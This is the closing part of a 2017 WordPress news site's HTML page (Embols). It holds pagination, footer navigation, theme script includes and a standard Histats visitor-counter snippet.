                        		
                        <!--Start Pagination-->
                                        			<div class="pagination">
                				<ul>
                					<li class="nav-previous"><a href="http://embols.com/page/2/" rel="nofollow"><i class="fa fa-angle-left"></i> Previous</a></li>
                                    <li class="nav-next"></li>
                				</ul>
                			</div>
                		                		<!--End Pagination-->
        
                    	</div>
	</div><!--#page-->
</div><!--.main-container-->
<footer class="footer" role="contentinfo" itemscope itemtype="http://schema.org/WPFooter">
    <div class="container">
                <div class="copyrights">
            <!--start copyrights-->
<div class="row" id="copyright-note">
    <div class="copyright"><a href="http://embols.com/" title="Breaking News, Latest News and Videos" rel="nofollow">Embols</a> Copyright &copy; 2017. </div>
    <a href="#blog" class="toplink" rel="nofollow"><i class="fa fa-angle-up"></i></a>
    <div class="top">
        <div class="footer-navigation" role="navigation" itemscope itemtype="http://schema.org/SiteNavigationElement">
            <nav id="navigation" class="clearfix">
                                    <ul class="menu clearfix">
                        <li class="page_item page-item-2"><a href="http://embols.com/sample-page/">Sample Page</a></li>
<li class="page_item page-item-7"><a href="http://embols.com/sample-page-2/">Sample Page</a></li>
<li class="page_item page-item-520"><a href="http://embols.com/yop-poll-archive/">Yop Poll Archive</a></li>
                    </ul>
                            </nav>
        </div>  
    </div>
</div>
<!--end copyrights-->
        </div> 
    </div><!--.container-->
</footer><!--footer-->
<script type='text/javascript' src='http://embols.com/wp-includes/js/wp-embed.min.js?ver=4.7.2'></script>
<script type='text/javascript' src='http://embols.com/wp-content/themes/sociallyviral/js/sticky.js?ver=4.7.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var mts_ajax_loadposts = {"startPage":"1","maxPages":"123","nextLink":"http:\/\/embols.com\/page\/2\/","autoLoad":"1","i18n_loadmore":"Load More","i18n_loading":"Loading...","i18n_nomore":"No more posts."};
var mts_ajax_search = {"url":"http:\/\/embols.com\/wp-admin\/admin-ajax.php","ajax_search":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://embols.com/wp-content/themes/sociallyviral/js/ajax.js?ver=4.7.2'></script>
<script type='text/javascript' src='http://embols.com/wp-content/themes/sociallyviral/js/history.js?ver=4.7.2'></script>
<!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,3633438,4,0,0,0,00000000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?3633438&101" alt="best counter" border="0"></a></noscript>
<!-- Histats.com  END  -->
</body>
</html>